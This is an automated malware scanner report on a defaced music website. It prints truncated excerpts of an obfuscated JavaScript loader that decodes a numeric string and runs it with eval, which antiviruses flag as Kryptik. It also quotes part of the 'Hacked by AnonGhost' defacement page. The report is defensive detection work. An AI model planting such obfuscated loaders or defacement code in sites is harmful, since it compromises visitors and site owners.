New scan:

Malware Scanner report for mr-x-music.com

Malicious/Suspicious/Total urls checked
2/0/2
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by AnonGhost  (2430 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://mr-x-music.com/
200 OK
Content-Length: 14124
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)


var _3654;var _5127='14364D147D128A1433A1538A1489C1412F1531C1454E1496E1489A943E1489B1426B1552E1328D1454A1489E1419F1496E1552E1062E999C1538C1517C1475E1006D943F1580F789F782D1503D1496B1503A1538E1503F1328D1454A1489D1419B1496F1552C1062D943F1146A943E1552F1454C1489E1419D1496C1552A1041C1496C1503B1426F1489F999D789B782D782E1538B1517C1475A1027B789D782F782E957E1503A1496C1503D1314F1503E1328D1454E1489F1419D1496B1552E1062C957C1027D789E782B782C957D1447C1426D1454F1440B1447D1531C1146C1069E1055B1027F1552A1454
... 9772 bytes are skipped ...
374[_1096](_9266[1])/21);var _2518=(_1096==8)?String:eval;_7087='';_11=_2374[_1096](_9266[0])/_2374[_1096](_9266[1]);for(_3654=3;_3654<_11;_3654++)_7087+=(_2374[_1096-2]((_2374[_1096](_9266[_3654])+_2374[_1096](_9266[2])+_2374[_1096](_9266[1]))/_2374[_1096](_9266[1])-_2374[_1096](_9266[2])+_2374[_1096](_9266[1])-1));var _3697='_4309';var _7413='_3697=_7087';function _4241(_3892){_2518(_4838);_4241(_9881);_9881(_7413);_4241(_3697);}var _4838='_4241=_2518';var _9881='_9881=_4241';_4241(_3603);

Antivirus reports:

Norman
Kryptik.CCJB
ESET-NOD32
JS/Kryptik.ALB

Deface/Content modification. The following signature was found: Hacked by AnonGhost

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="shortcut icon" href="http://www.iconj.com/ico/z/p/zpsi90lfc7.ico" type="image/x-icon" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Hacked by AnonGhost</title><style type="text/css"><!-- body { background-color: #000000; margin-left: 0px; margin-top: 0px; text-align: center; background-repeat: repeat-x;} --><!-- Made By Virusa Worm --></style></head><body bgColor="#000000" onload="teclear();"oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'><table width="781" border="0" align="center" cellpadding="0"
...[13815 bytes skipped]...


http://mr-x-music.com/test404page.js
200 OK
Content-Length: 14124
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _3654;var _5127='14364D147D128A1433A1538A1489C1412F1531C1454E1496E1489A943E1489B1426B1552E1328D1454A1489E1419F1496E1552E1062E999C1538C1517C1475E1006D943F1580F789F782D1503D1496B1503A1538E1503F1328D1454A1489D1419B1496F1552C1062D943F1146A943E1552F1454C1489E1419D1496C1552A1041C1496C1503B1426F1489F999D789B782D782E1538B1517C1475A1027B789D782F782E957E1503A1496C1503D1314F1503E1328D1454E1489F1419D1496B1552E1062C957C1027D789E782B782C957D1447C1426D1454F1440B1447D1531C1146C1069E1055B1027F1552A1454
... 9772 bytes are skipped ...
374[_1096](_9266[1])/21);var _2518=(_1096==8)?String:eval;_7087='';_11=_2374[_1096](_9266[0])/_2374[_1096](_9266[1]);for(_3654=3;_3654<_11;_3654++)_7087+=(_2374[_1096-2]((_2374[_1096](_9266[_3654])+_2374[_1096](_9266[2])+_2374[_1096](_9266[1]))/_2374[_1096](_9266[1])-_2374[_1096](_9266[2])+_2374[_1096](_9266[1])-1));var _3697='_4309';var _7413='_3697=_7087';function _4241(_3892){_2518(_4838);_4241(_9881);_9881(_7413);_4241(_3697);}var _4838='_4241=_2518';var _9881='_9881=_4241';_4241(_3603);

Antivirus reports:

Norman
Kryptik.CCJB
ESET-NOD32
JS/Kryptik.ALB


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mr-x-music.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 Jun 2014 20:33:09 GMT
Server: nginx/1.6.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: mr-x-music.com
Referer: http://www.google.com/search?q=mr-x-music.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mr-x-music.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mr-x-music.com/

Result: mr-x-music.com is not infected or malware details are not published yet.